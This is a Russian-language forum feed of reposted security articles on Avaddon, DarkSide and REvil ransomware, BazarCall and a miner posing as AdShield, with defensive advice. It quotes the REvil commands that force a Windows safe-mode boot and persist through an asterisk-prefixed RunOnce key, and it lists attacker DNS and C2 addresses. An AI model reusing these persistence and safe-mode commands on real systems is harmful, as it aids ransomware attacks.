Злоумышленники Avaddon используют такие инструменты, как Mimikatz, для кражи учетных данных для доступа к учетной записи и для повышения привилегий после того, как они окажутся внутри сети. Mimikatz может собирать информацию из запущенного процесса Microsoft LSASS.exe, который содержит хэши имен и паролей пользователей, вошедших в систему в данный момент. Иногда злоумышленники оставляют эту функцию включенной, а затем намеренно ломают что-то на компьютере, на которое они нацелены, спровоцировав администратора войти в систему, чтобы исправить это. Затем злоумышленники могут захватить учетные данные этого администратора.

Если Mimikatz заблокирован программным обеспечением безопасности, злоумышленники могут вместо этого использовать что-то вроде Microsoft Process Monitor для создания дампа памяти LSASS.exe и переноса этого файла дампа обратно на свою машину для извлечения информации с помощью Mimikatz. С Mimikatz не имеет значения, насколько длинные или сложные пароли, потому что они забирают их прямо из памяти.

4. Они просканируют вашу сеть. Они знают, сколько у вас серверов и конечных точек и где вы храните свои резервные копии, критически важные для бизнеса данные и приложения. Одна из первых вещей, которую делают злоумышленники, когда они попадают в сеть, - это определить, какой доступ у них есть на локальной машине. Следующий шаг - выяснить, какие существуют удаленные машины и могут ли они получить к ним доступ.

Операторы программ-вымогателей Avaddon, как и многие другие злоумышленники, использующие ручную клавиатуру, используют RDP для внутреннего бокового перемещения внутри сети, используя его для проникновения на серверы и компьютеры, которые несут ценные активы.

5. Злоумышленники, скорее всего, загрузили и установили бэкдоры, которые позволяют им заходить и выходить в вашу сеть и устанавливать дополнительные инструменты. Они настроят папки и каталоги для сбора и хранения украденной информации и каналов для связи с злоумышленниками и для передачи информации из вашей сети.

Бэкдоры бывают разных форм. Некоторые просто связываются с IP-адресом злоумышленников, позволяя им отправлять и получать команды на машину.

Многие бэкдоры классифицируются как легальные приложения. Например, злоумышленники могут использовать инструменты удаленного администрирования, такие как RDP, для поддержания доступа. Даже если RDP отключен по умолчанию, злоумышленнику с правами администратора очень легко его снова включить. Еще один распространенный законный инструмент - AnyDesk. Это предлагает злоумышленникам прямой контроль над машиной, включая управление мышью / клавиатурой и возможность видеть экран.

Известно, что операторы Avaddon используют Cobalt Strike, усовершенствованный инструмент для постэксплуатационного тестирования на проникновение. Злоумышленники часто пытаются установить маяк Cobalt Strike. Это обеспечивает регулярную обратную связь с сервером Cobalt Strike («командование и управление» для атаки Avaddon) и дает злоумышленникам полный контроль над машиной. Его также можно использовать для простого развертывания дополнительных маяков на других машинах в сети.

6. В дополнение к шифрованию данных и нарушению работы программного обеспечения и операций операторы Avaddon будут пытаться эксфильтровать корпоративные данные до основного события, связанного с вымогательством. Специалисты по реагированию на инциденты, которые расследовали атаки с участием Avaddon, обнаружили, что операторы использовали инструмент архивирования WinRar для сбора данных для эксфильтрации, а затем переправили данные поставщику облачного хранилища www.Mega.nz, используя свое приложение MegaSync. Mega пользуется популярностью у злоумышленников, поскольку предлагает им определенный уровень анонимности.

7. Они попытаются зашифровать, удалить, сбросить или удалить ваши резервные копии. Если ваши резервные копии не хранятся в автономном режиме, они находятся в пределах досягаемости злоумышленников. «Резервная копия», которая постоянно находится в сети и доступна, - это всего лишь вторая копия файлов, ожидающих шифрования.

8. Злоумышленники попытаются определить, какое решение безопасности используется в сети и могут ли они его отключить. Неважно, насколько хороша ваша защита, если злоумышленник может ее отключить.

Бесплатные инструменты по умолчанию, такие как Защитник Windows, могут быть немедленно отключены любым, у кого есть достаточные права администратора. Большинство современных программ-вымогателей пытаются сделать это по умолчанию. Злоумышленники также пытаются найти и получить доступ к консолям управления более продвинутых решений безопасности, чтобы отключить всю защиту непосредственно перед запуском программы-вымогателя.

Консоли управления безопасностью, размещенные локально, особенно подвержены риску, поскольку злоумышленники могут получить к ним доступ с учетными записями, которые они уже взломали.

9. Наиболее заметная часть атаки - выпуск программы-вымогателя - вероятно, произошла, когда ИТ-администраторы или специалисты по безопасности не были в сети, чтобы заметить и предотвратить длительный процесс шифрования файлов, возможно, посреди ночи или в выходные дни.

Примечание. Процесс шифрования занимает несколько часов. К моменту завершения работы программы-вымогателя на зашифрованной конечной точке Windows будут находиться десятки или сотни тысяч зашифрованных файлов. Для больших файловых серверов это может исчисляться миллионами. Вот почему большинство целевых атак программ-вымогателей запускаются посреди ночи, в выходные или праздничные дни, когда их наблюдает меньше людей.

10. Программа-вымогатель будет развернута на всех ваших конечных точках и любых серверах, которые были подключены к сети во время атаки - при условии, что это то, чего хотел злоумышленник. Программа-вымогатель «развертывается» как обычное приложение; в большинстве атак он не распространяется случайным образом во всех направлениях. Если ваши серверы были зашифрованы, но не ваши конечные точки, это потому, что злоумышленник решил нацеливаться только на ваши серверы.

Программа-вымогатель может быть развернута разными способами. В случае Avaddon злоумышленники, скорее всего, создали запланированные задачи на конечных точках и серверах в сети, которые развернули программу-вымогатель в заранее определенное время.

Другой метод, обычно используемый многими различными семействами программ-вымогателей, - это комбинация пакетных сценариев и инструмента Microsoft PsExec, который является отличным инструментом для выполнения команд на удаленных машинах. Злоумышленник может создать пакетный сценарий, который просматривает список ваших IP-адресов, используя PsExec для копирования программы-вымогателя на каждую машину, а затем выполняет ее.

Хотя большинство решений безопасности (включая Sophos) по умолчанию блокируют PsExec, администраторы часто разрешают его использование в своей сети, потому что они тоже считают его полезным - и, к сожалению, злоумышленники это знают.

Злоумышленники также могут создать или изменить существующий сценарий входа в систему объекта групповой политики (GPO). Если вы не заметите этого, атака может возобновляться каждый раз, когда машина загружается и подключается к домену. Создается впечатление, что программа-вымогатель «распространяется», когда она вызвана только объектом групповой политики.

11. Запуск программы-вымогателя - это еще не конец. Злоумышленники могут использовать установленные ими ранее инструменты, чтобы оставаться в сети для отслеживания ситуации и даже для вашей электронной почты, чтобы увидеть, как вы реагируете на выпуск программы-вымогателя. Электронное письмо генеральному директору, в котором говорится, что с вами все будет в порядке, потому что они не зашифровали резервные копии на Сервере X, может привести к катастрофе, если злоумышленник прочитает его и все еще имеет доступ к этому серверу.

Злоумышленник также может дождаться вашего восстановления, чтобы затем запустить вторую атаку, чтобы действительно подчеркнуть, что он может продолжать делать это, пока вы не заплатите.

У злоумышленников Avaddon есть еще одна тактика, направленная на то, чтобы заставить цели заплатить: они запускают DDoS-атаку в попытке нарушить работу и связь.

12. Время, проведенное в вашей сети, вероятно, позволило злоумышленникам украсть критически важную, конфиденциальную и конфиденциальную информацию, которую они теперь угрожают публично раскрыть. Контроллеры Avaddon RaaS используют общедоступный «сайт утечки»: avaddongun7rngel [.] Onion. Цели, пораженные филиалами Avaddon, подвергаются риску публикации их данных на сайте для всеобщего обозрения, если они не заплатят выкуп. Некоторые из наиболее ценных данных могут быть проданы другим злоумышленникам для использования в дальнейших атаках.

Злоумышленники Avaddon утверждают, что они начнут публиковать украденные данные где-нибудь через несколько дней или неделю после основной атаки, если не будет получен контакт с целью или переговоры прервутся. Обычно они начинают с публикации около 5% данных, которые, по их утверждениям, хранятся. Однако может пройти несколько недель или даже больше, прежде чем что-либо будет опубликовано.

Кроме того, хотя злоумышленники могут пообещать удалить вашу информацию, если вы заплатите, у вас нет никаких гарантий, что они это сделают.
Что могут сделать защитники

Вы можете предпринять ряд упреждающих шагов для повышения своей ИТ-безопасности в будущем, в том числе:


====quote====
    Контролируйте свою сетевую безопасность 24/7 и помните о пяти ранних индикаторах присутствия злоумышленника, чтобы остановить атаки программ-вымогателей, прежде чем они начнутся.

 Отключите протокол удаленного рабочего стола (RDP) с выходом в Интернет, чтобы запретить киберпреступникам доступ к сетям. Если вам нужен доступ к RDP, поместите его за VPN-соединение и принудительно используйте многофакторную аутентификацию (MFA).

   Обучите сотрудников тому, на что следует обращать внимание в отношении фишинга и вредоносного спама, и внедрите надежные политики безопасности.

   Регулярно создавайте резервные копии самых важных и актуальных данных на автономном устройстве хранения. Стандартная рекомендация для резервного копирования - следовать методу 3-2-1: 3 копии данных с использованием 2 разных систем, 1 из которых находится в автономном режиме.

   Предотвратите доступ злоумышленников к вашей безопасности и отключите ее: выберите расширенное решение с облачной консолью управления с включенной многофакторной аутентификацией и ролевым администрированием для ограничения прав доступа

   Помните, что не существует единой серебряной пули для защиты, и важна многоуровневая, многоуровневая модель безопасности - распространите ее на все конечные точки и серверы и убедитесь, что они могут обмениваться данными, связанными с безопасностью

   Разработайте эффективный план реагирования на инциденты и обновляйте его по мере необходимости. Если вы не уверены, что обладаете навыками или ресурсами, чтобы делать это, отслеживать угрозы или реагировать на чрезвычайные ситуации, подумайте об обращении за помощью к внешним экспертам.

=============

Заключение

Работа с кибератакой - это стрессовый опыт. Может возникнуть соблазн устранить непосредственную угрозу и закрыть книгу об инциденте, но правда в том, что таким образом вы вряд ли устранили все следы атаки. Важно, чтобы вы нашли время, чтобы определить, как злоумышленники проникли, извлечь уроки из любых ошибок и улучшить свою безопасность. Если вы этого не сделаете, вы рискуете, что тот же злоумышленник или другой может прийти и сделать то же самое на следующей неделе.

https://news.sophos.com/en-us/2021/05/24/what-to-expect-when-youve-been-hit-with-avaddon-ransomware/
09.06.2021 03:53:43, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16445/message112558/ http://forum.esetnod32.ru/messages/forum9/topic16445/message112558/ Wed, 09 Jun 2021 03:53:43 +0300 Полезная информация Как защитить сеть от DarkSide и других программ-вымогателей Как защитить сеть от DarkSide и других программ-вымогателей в форуме Полезная информация.
Как защитить сеть от DarkSide и других программ-вымогателей

Следующие ниже методы могут помочь организациям снизить риск инцидента с шифраторами.

Тренинг по повышению осведомленности о кибербезопасности: поскольку большая часть программ-вымогателей распространяется посредством действий, инициированных пользователями, организациям следует внедрять обучающие программы, направленные на обучение конечных пользователей основам кибербезопасности. Программы-вымогатели и методы их распространения постоянно развиваются, поэтому обучение должно происходить постоянно, чтобы конечные пользователи могли столкнуться с текущими угрозами.
Гигиена учетных данных: соблюдение надлежащей гигиены учетных данных может помочь предотвратить атаки методом перебора, смягчить последствия кражи учетных данных и снизить риск несанкционированного доступа к сети.
Многофакторная аутентификация: MFA обеспечивает дополнительный уровень безопасности, который может помочь предотвратить несанкционированный доступ к учетным записям, инструментам, системам и хранилищам данных. Организации должны рассмотреть возможность включения MFA везде, где это возможно.
Исправления безопасности: организации любого размера должны иметь надежную стратегию управления исправлениями, которая гарантирует, что обновления безопасности на всех конечных точках, серверах и устройствах применяются как можно скорее, чтобы минимизировать окно возможностей для атаки.
Резервное копирование: резервное копирование - один из наиболее эффективных способов смягчения последствий инцидента с программным вымогателем. Многие виды программ-вымогателей могут распространяться по сети и шифровать локально хранимые резервные копии, поэтому организациям следует использовать различные хранилища мультимедиа и хранить резервные копии как на месте, так и за его пределами. См. Это руководство для получения дополнительной информации о создании резервных копий, защищенных от программ-вымогателей.
Повышение безопасности системы: усиление защиты сетей, серверов, операционных систем и приложений имеет решающее значение для уменьшения поверхности атаки и управления потенциальными уязвимостями безопасности. Отключение ненужных и потенциально используемых служб, таких как PowerShell, RDP, Windows Script Host, макросы Microsoft Office и т. Д., Снижает риск первоначального заражения, а реализация принципа наименьших привилегий может помочь предотвратить боковое перемещение.
Блокировать макросы: многие семейства программ-вымогателей поставляются через встроенные макросы Microsoft Office или PDF-документы. Организации должны пересмотреть использование макросов, рассмотреть возможность блокировки всех макросов из Интернета и разрешить выполнение только проверенных и утвержденных макросов из надежных мест.
Аутентификация электронной почты: организации могут использовать различные методы проверки подлинности электронной почты, такие как структура политики отправителя, почта с идентификацией DomainKeys и проверка подлинности сообщений на основе домена, отчетность и соответствие, для обнаружения подделки электронной почты и выявления подозрительных сообщений.
Сегрегация сети: эффективное разделение сети помогает сдерживать инциденты, предотвращает распространение вредоносных программ и сокращает нарушение целостности бизнеса.
Мониторинг сети: организации любого размера должны иметь системы для отслеживания возможных каналов утечки данных и немедленного реагирования на подозрительную активность.
Тестирование на проникновение: тестирование на проникновение может быть полезно для выявления уязвимостей в ИТ-инфраструктуре и уязвимости сотрудников к программам-вымогателям. Результаты теста можно использовать для распределения ИТ-ресурсов и информирования о будущих решениях по кибербезопасности.
План реагирования на инциденты: организации должны иметь комплексный план реагирования на инциденты, в котором точно указывается, что делать в случае заражения. Быстрое реагирование может помочь предотвратить распространение вредоносного ПО, свести к минимуму сбои и обеспечить максимально эффективное устранение инцидента.

https://blog.emsisoft.com/en/38577/ransomware-profile-darkside/
18.05.2021 07:53:14, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16422/message112386/ http://forum.esetnod32.ru/messages/forum9/topic16422/message112386/ Tue, 18 May 2021 07:53:14 +0300 Полезная информация Злоумышленники теперь дважды шифруют данные с помощью нескольких штаммов вымогателей. Злоумышленники теперь дважды шифруют данные с помощью нескольких штаммов вымогателей. в форуме Полезная информация.
Сценарий: вы заплатили выкуп, получили инструмент дешифрования от злоумышленника и использовали его для восстановления ваших файлов ... только для того, чтобы обнаружить, что некоторые или все из них все еще зашифрованы. Именно в такой ситуации оказались некоторые компании.

Недавно мы наблюдали новую тенденцию, когда злоумышленники используют несколько разновидностей программ-вымогателей для двойного шифрования данных, чтобы еще больше усложнить процесс восстановления и повысить свои шансы на выплату.

В этом сообщении блога мы обсуждаем, как работает двойное шифрование, возможные мотивы, лежащие в основе этой тактики, и лучший способ пострадавшим организациям восстановиться после атаки с двойным шифрованием.

Метод двойного вымогательства, о котором идет речь в этой статье, возникает, когда один злоумышленник решает развернуть несколько штаммов программ-вымогателей в одной сети. Важно отметить, что это не тот тип атак с несколькими программами-вымогателями, который мы видели в прошлом, когда одна сеть взламывается несколькими злоумышленниками, что приводит к развертыванию нескольких вариантов программ-вымогателей в одной и той же сети в отдельных атаках.

 
====quote====
Как это работает

   Больше не довольствуясь двойным вымогательством, некоторые аффилированные лица теперь предпочитают двойное шифрование данных: другими словами, развертывают более одного типа программ-вымогателей в одной сети. Например, мы видели случаи, когда аффилированные лица шифруют данные с помощью REvil и Netwalker, а также другие случаи, когда MedusaLocker и GlobeImposter использовались в тандеме. В некоторых случаях, чтобы доказать, что файлы с двойным шифрованием могут быть восстановлены при оплате спроса, филиалы предоставляют образцы расшифрованных файлов через веб-портал одной группы, когда зашифрованные файлы были отправлены им через веб-портал другой группы. Очевидно, что в этих случаях аффилированные лица поддерживали рабочие отношения с обеими группами - что не является редкостью.

   Мы видели, как стратегия двойного шифрования применяется двумя способами:

   Многоуровневое шифрование: данные шифруются с помощью программы-вымогателя A, а затем зашифрованные данные повторно шифруются с помощью программы-вымогателя B.

   Параллельное шифрование: некоторые системы зашифрованы с помощью программы-вымогателя A, а другие - с помощью программы-вымогателя B. В некоторых случаях обе системы добавляют зашифрованные файлы с одним и тем же расширением, что может еще больше усложнить восстановление.

=============
Почему злоумышленники используют двойное шифрование

Хотя мы не умеем читать мысли и поэтому не можем сказать наверняка, почему злоумышленники используют двойное шифрование, есть несколько очевидных объяснений:
Помешать усилиям по восстановлению

Восстановление после регулярной атаки программ-вымогателей - дорогостоящее, трудоемкое и трудоемкое занятие. Злоумышленники могут полагать, что добавление еще одного уровня шифрования к и без того сложному процессу восстановления может быть дополнительным рычагом, необходимым для того, чтобы убедить жертв платить за расшифровку, а не восстанавливать свои системы самостоятельно.
Повышенная выплата

Двойное шифрование потенциально означает двойную выплату. Злоумышленники, скорее всего, полагаются на жертв, которые не осознают, что их данные были зашифрованы дважды. В этом сценарии жертвы будут платить за удаление первого уровня шифрования только для того, чтобы обнаружить, что их файлы заблокированы вторым уровнем шифрования, который может быть удален только с дополнительным выкупом.
Более высокий шанс успешного развертывания

Злоумышленники могут использовать несколько разновидностей программ-вымогателей, чтобы повысить свои шансы на успешное развертывание. В случае, если один вариант вымогателя не работает должным образом или блокируется инструментами безопасности цели, другой вымогатель все еще может запуститься.
A / B тестирование

Также возможно, что злоумышленники используют двойное шифрование как форму A / B-тестирования, чтобы увидеть, какой вариант программы-вымогателя приводит к увеличению выплат выкупа. Результаты таких тестов могут определить, какие варианты атак отдают предпочтение в будущих атаках.
Двойное шифрование делает восстановление намного сложнее

Двойное шифрование значительно усложняет восстановление

Выплата выкупа не выводит компании из леса. Даже при использовании инструментов злоумышленников восстановление всегда затруднено, а двойное шифрование делает его еще более сложным. На самом деле, намного сложнее.

В случае однократного шифрования существует высокий риск повреждения данных либо из-за программы-вымогателя, либо из-за дешифратора злоумышленника. В случае двойного шифрования этот риск увеличивается вдвое. Кроме того, расшифровка - это трудоемкий процесс. Инструменты злоумышленников обычно не позволяют указывать папку для папок для дешифрования и вместо этого медленно сканируют всю систему. Следовательно, когда инструменты выходят из строя, что случается часто, или когда обнаруживается второй уровень шифрования, процесс дешифрования должен начинаться заново. Точно так же инструменты часто требуют ручного вмешательства, требуя присутствия каждой рабочей станции во время дешифрования и ввода команд по мере необходимости. Короче говоря, специалисты по реагированию на инциденты вынуждены переключаться между одним плохо запрограммированным инструментом и другим. А случаи двойного шифрования удваивают проблемы.

Делаем восстановление проще и быстрее

Как отмечалось выше, двойное шифрование делает восстановление еще более сложным и без соответствующих инструментов, вероятно, приведет к тому, что организации будут испытывать значительно большее время простоя.

Чтобы помочь жертвам программ-вымогателей с двойным шифрованием быстрее выздороветь, Emsisoft предлагает универсальный дешифратор, специально разработанный для обработки инцидентов, связанных с программами-вымогателями, в которых задействовано несколько вариантов. Универсальный дешифратор может отслаивать несколько уровней шифрования без необходимости использования нескольких дешифраторов, предоставляемых злоумышленником, которые часто реализованы несовершенно и иногда могут безвозвратно повредить данные в процессе дешифрования.

Универсальный дешифратор был создан для решения этих и других проблем: он безопаснее, чем инструменты, предоставляемые злоумышленником, поддерживает скрипты, поддерживает полную отчетность, избавляет от необходимости создавать резервные копии зашифрованных файлов и может сократить время восстановления на 70%.

https://blog.emsisoft.com/en/38554/psa-threat-actors-now-double-encrypting-data-with-multiple-ransomware-strains/
18.05.2021 07:00:18, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16421/message112385/ http://forum.esetnod32.ru/messages/forum9/topic16421/message112385/ Tue, 18 May 2021 07:00:18 +0300 Полезная информация BazarCall использует вредоносные центры обработки вызовов для заражения жертв BazarCall использует вредоносные центры обработки вызовов для заражения жертв в форуме Полезная информация.
В течение последних двух месяцев исследователи безопасности вели онлайн-битву против нового вредоносного ПО BazarCall, которое использует центры обработки вызовов для распространения некоторых из наиболее вредоносных вредоносных программ для Windows.

Новое вредоносное ПО было обнаружено как распространяемое центрами обработки вызовов в конце января и названо BazarCall или BazaCall, поскольку злоумышленники изначально использовали его для установки вредоносного ПО BazarLoader.

Как и многие вредоносные кампании, BazarCall начинается с фишингового электронного письма, но затем переходит к новому методу распространения - использованию телефонных колл-центров для распространения вредоносных документов Excel, которые устанавливают вредоносные программы.

Вместо того, чтобы связывать вложения с электронным письмом, электронные письма BazarCall предлагают пользователям позвонить по номеру телефона, чтобы отменить подписку, прежде чем они будут автоматически списаны. Эти центры обработки вызовов будут затем направлять пользователей на специально созданный веб-сайт для загрузки «формы отмены», устанавливающей вредоносное ПО BazarCall.

От фишинговых писем до колл-центров

Все атаки BazarCall начинаются с фишингового электронного письма, нацеленного на корпоративных пользователей, в котором говорится, что бесплатная пробная версия получателя скоро истечет. Однако эти электронные письма не содержат никаких подробностей о предполагаемой подписке.

Эти электронные письма затем предлагают пользователю связаться с указанным номером телефона, если он хочет отменить подписку, прежде чем с него будет взиматься плата от 69,99 до 89,99 долларов за продление, как показано в примере фишингового письма BazarCall ниже.

Пользователь добавил изображение

Большая часть электронных писем были отправлены с указанием вымышленной компании, такие как "Medical reminder service, Inc.", 'iMed Service, Inc.', 'Blue Cart Service, Inc. . 'и' iMers, Inc. '

Во всех этих письмах используются похожие темы, такие как «Спасибо за использование бесплатной пробной версии» или «Ваш бесплатный пробный период почти закончился!» Исследователь безопасности ExecuteMalware составил более обширный список тем электронной почты, используемых в этой атаке.

Когда получатель звонит по указанному номеру телефона, он будет переведен на короткое удержание, а затем его встретит живой человек. При запросе дополнительной информации или о том, как отменить подписку, агент центра обработки вызовов запрашивает у жертвы уникальный идентификатор клиента, указанный в электронном письме.

Если указан правильный идентификатор клиента, агент колл-центра направит пользователя на поддельный веб-сайт, который выдает себя за компанию, предоставляющую медицинские услуги. Телефонный агент останется на телефоне с жертвой и направит их на страницу отмены, где им будет предложено ввести свой идентификатор клиента.

Когда пользователь вводит свой идентификационный номер клиента, веб-сайт автоматически предлагает браузеру загрузить документ Excel (xls или xlsb). Затем агент центра обработки вызовов поможет жертве открыть файл и нажать кнопку «Включить контент», чтобы активировать вредоносные макросы.

В некоторых звонках, злоумышленники просили его отключить антивирус, чтобы предотвратить обнаружение вредоносных документов.

Пользователь добавил изображение

Когда макросы Excel включены, вредоносная программа BazarCall загружается и запускается на компьютере жертвы.

Когда кампания BazarCall только началась, она использовалась для распространения вредоносного ПО BazarLoader, но также начала распространять TrickBot, IcedID, Gozi IFSB и другие вредоносные программы.

Эти заражения Windows особенно опасны, поскольку они обеспечивают удаленный доступ к скомпрометированным корпоративным сетям, где злоумышленники распространяются по сети, чтобы украсть данные или развернуть программы-вымогатели.

Злоумышленники используют BazarLoader и Trickbot для развертывания программ-вымогателей Ryuk или Conti, в то время как IcedID использовался в прошлом для развертывания заражений программ-вымогателей Maze и Egregor.

Благодаря усилиям исследователей служба распространения была вынуждена постоянно менять их номера телефонов и хостинговые сайты, поскольку исследователи их отключили.

К сожалению, даже благодаря совместным усилиям сообщества специалистов по кибербезопасности этот метод распространения оказался очень успешным.

Из-за метода распространения образцы вредоносных программ обычно имеют очень низкий уровень обнаружения на VirusTotal, поскольку они не распространяются публично и не обнаруживаются поставщиками антивирусов.

Кроме того, судя по электронным письмам, люди попадают на эту аферу, поскольку считают, что это законные подписки, которые необходимо отменить.

https://www.bleepingcomputer.com/news/security/bazarcall-malware-uses-malicious-call-centers-to-infect-victims/
01.04.2021 11:26:25, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16379/message112237/ http://forum.esetnod32.ru/messages/forum9/topic16379/message112237/ Thu, 01 Apr 2021 11:26:25 +0300 Полезная информация REvil Ransomware использует новый режим шифрования из Windows Safe Mode REvil Ransomware использует новый режим шифрования из Windows Safe Mode в форуме Полезная информация.
REvil добавил новую возможность шифрования файлов в безопасном режиме Windows, что позволяет избежать обнаружения программным обеспечением безопасности и добиться большего успеха при шифровании файлов.

Безопасный режим Windows - это специальный режим запуска, который позволяет пользователям запускать административные и диагностические задачи в операционной системе. В этом режиме загружается только самый минимум программного обеспечения и драйверов, необходимых для работы операционной системы.

Более того, любые установленные в Windows программы, которые настроены на автоматический запуск, не будут запускаться в безопасном режиме, если их автозапуск не настроен определенным образом.

Один из способов создать автозапуск в Windows - создать записи в следующих разделах реестра:

   
====quote====
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion­\Run
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\­Run
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion­\RunOnce
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\­RunOnce
=============

Ключи «Run» запускают программу каждый раз, когда вы входите в систему, а ключи «RunOnce» запускает программу только один раз, а затем удаляет запись из реестра.

Например, следующий ключ реестра автоматически запустит программу C:\Users\test\test.exe при входе в Windows.

 
====quote====
 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Startup"="C:\Users\test\test.exe"
=============


Однако указанный выше автозапуск не запустится в безопасном режиме, если вы не добавите звездочку (*) в начало имени значения, как показано ниже:


====quote====
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "* Startup" = "C:\Users\test\test.exe"
=============

REvil теперь включает режим 'Safe Mode'

В новом образце вымогателя REvil, обнаруженном MalwareHunterTeam, был добавлен новый аргумент командной строки -smode, который заставляет компьютер перезагружаться в безопасном режиме перед шифрованием устройства.

Для этого REvil выполнит следующие команды, чтобы компьютер загрузился в безопасном режиме с загрузкой сетевых драйверов при следующей перезагрузке Windows.

 
====quote====
 bootcfg /raw /a /safeboot:network /id 1
   bcdedit /set {current} safeboot network
=============


Затем он создает автозапуск «RunOnce» под названием «* franceisshit», который выполняет «bcdedit / deletevalue {current} safeboot» после того, как пользователь войдет в безопасный режим.

Наконец, программа-вымогатель выполняет принудительный перезапуск Windows, который не может быть прерван пользователем.

Непосредственно перед завершением процесса он создаст дополнительный автозапуск RunOnce под названием «AstraZeneca», возможно, в связи с недавними обсуждениями во Франции использования вакцины.

Этот автозапуск перезапустит программу-вымогатель REvil без аргумента -smode, когда следующий пользователь войдет в систему после перезагрузки устройства.

Важно помнить, что обе эти записи RunOnce будут выполнены после входа в безопасный режим и будут автоматически удалены Windows.

После перезагрузки устройство запустится в безопасном режиме с загрузкой сетевых драйверов, и пользователю будет предложено войти в Windows. После входа в систему программа-вымогатель REvil будет запущена без аргумента -smode, чтобы начать шифрование файлов на устройстве.

Windows также запустит команду «bcdedit / deletevalue {current} safeboot», настроенную ключом реестра «* AstraZeneca», чтобы компьютер мог перезагрузиться в нормальный режим после завершения работы программы-вымогателя.

Пока REvil шифрует файлы, экран безопасного режима будет пустым, но по-прежнему можно использовать Ctrl + Alt + Delete для запуска диспетчера задач Windows. Оттуда вы можете увидеть запущенный исполняемый файл, который в нашем тесте называется «smode.exe», как показано ниже.

Во время работы программа-вымогатель не позволяет пользователям запускать какие-либо программы через диспетчер задач, пока не завершит шифрование устройства.

После того, как устройство будет зашифровано, будет продолжена остальная часть последовательности загрузки, а рабочий стол будет показан с запиской о выкупе и зашифрованными файлами.

Необычный подход

Новая операция REvil в безопасном режиме немного странная, поскольку требует от пользователей входа в систему после перезапуска в безопасном режиме.

Кроме того, как только они войдут в безопасный режим, они будут представлены с пустым экраном и загрузкой дисков, поскольку программа-вымогатель шифрует устройство.

Такое поведение может привести к тому, что пользователи могут перейти в спящий режим или выключат свои компьютеры в целях безопасности.

По этой причине возможно, что злоумышленники вручную запускают новую команду безопасного режима на определенных компьютерах, таких как виртуальные машины или серверы, которые они хотят зашифровать без проблем.

Независимо от причин, это еще один новый метод атаки, на который следует обратить внимание специалистам по безопасности и администраторам Windows, поскольку группы вымогателей постоянно меняют свою тактику.

REvil - не единственная операция, использующая безопасный режим для шифрования устройств.

В 2019 году еще одна программа-вымогатель, известная как Snatch, также добавила возможность шифровать устройство в безопасном режиме с помощью службы Windows.

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/
24.03.2021 15:10:59, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16370/message112208/ http://forum.esetnod32.ru/messages/forum9/topic16370/message112208/ Wed, 24 Mar 2021 15:10:59 +0300 Полезная информация Майнер Monero распространяется через установку пакетов AdShield/Netshield, OpenDNS Майнер Monero распространяется через установку пакетов AdShield/Netshield, OpenDNS в форуме Полезная информация.
Активность майнера наблюдалась на форумах безопасности (Kasperskyclub.ru, Virusinfo.info, Cyberforum.ru) в период с февраля 2021, хотя отзывы о проблеме судя по поискам в сети пошли ранее (ноябрь-декабрь 2020г)
По отчету Лаборатории Касперского на securelist.ru, активное детектирование зловредов началось с февраля 2021 года.

1.


====quote====
   Зловред распространяется под именем adshield[.]pro и выдает себя за Windows-версию мобильного блокировщика рекламы AdShield. После того как пользователь запускает программу, она меняет настройки DNS на устройстве так, что все домены начинают разрешаться через серверы злоумышленников, которые, в свою очередь, не дают пользователям получить доступ к сайтам некоторых антивирусов, например к Malwarebytes.com.
=============

185.201.47.42,142.4.214.15\DNS Server list

2.


====quote====
   После подмены DNS-серверов зловред начинает обновляться и запускает updater.exe с аргументом self-upgrade («C:\Program Files (x86)\AdShield\updater.exe» -self-upgrade). Updater.exe обращается к командному центру и отправляет сведения о зараженной машине и информацию о начале установки.
=============

C:\PROGRAM FILES (X86)\ADSHIELD\UPDATER.EXE
HEUR:Trojan.Win32.DNSChanger.gen
C:\WINDOWS\SYSTEM32\TASKS\ADSHIELD SCHEDULED AUTOUPDATE
"C:\Program Files (x86)\AdShield\updater.exe" -self-upgrade

3.


====quote====
   Updater.exe скачивает с сайта transmissionbt[.]org и запускает модифицированный торрент-клиент Transmission (оригинальный дистрибутив находится по адресу transmissionbt.com). Модифицированная программа отсылает на командный сервер информацию об установке вместе с идентификатором зараженной машины и загружает с него модуль для майнинга.
=============

Модули для майнинга состоят из легитимных вспомогательных библиотек, зашифрованного файла с майнером data.pak, исполняемого файла flock.exe\slack.exe\discord.exe и файла «лицензии» lic.data.


====quote====
   ....
   \Flock\config.json
   \Flock\data.pak
   \Flock\Flock.exe
   \Flock\lic.data
   \Flock\Qt5Core.dll
   \Flock\WinRing0x64.sys
   ...
=============

4. flock.exe запускается с помощью клиента transmission (запускаемый как служба)
C:\PROGRAM FILES (X86)\TRANSMISSION\TRANSMISSION-DAEMON.EXE
Действительна, подписано SignPath Foundation
"C:\Program Files (x86)\Transmission\transmission-daemon.exe" -run-instance

5. после запуска Flock.exe расшифровывает данные из файла data.pak, содержащие файл майнера.
далее, в копию системного файла find.exe внедряется расшифрованное тело майнера.

(!) Процесс нагружает CPU: C:\WINDOWS\SYSTEM32\FIND.EXE
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3648], tid=3940


====quote====
Полное имя C:\WINDOWS\SYSTEM32\FIND.EXE

Удовлетворяет критериям
THREADS IN PROCESSES (ПРЕДУПРЕЖДЕНИЕ ~ ОБНАРУЖЕН ВНЕДРЕННЫЙ ПОТОК В ПРОЦЕССЕ)(1) [auto (0)]
FLOCK (FILTERED) (ПОЛНОЕ ИМЯ ~ \WINDOWS\SYSTEM32\FIND.EXE)(1) [filtered (0)]
FLOCK (FILTERED).NET ( ESTABLISHED ~ > 54.93.84.207:443)(1) [filtered (0)]

pid = 3076 ***\***
CmdLine "C:\ProgramData\Flock\find.exe"
Процесс создан 00:39:49 [2021.02.18]
С момента создания 00:05:25
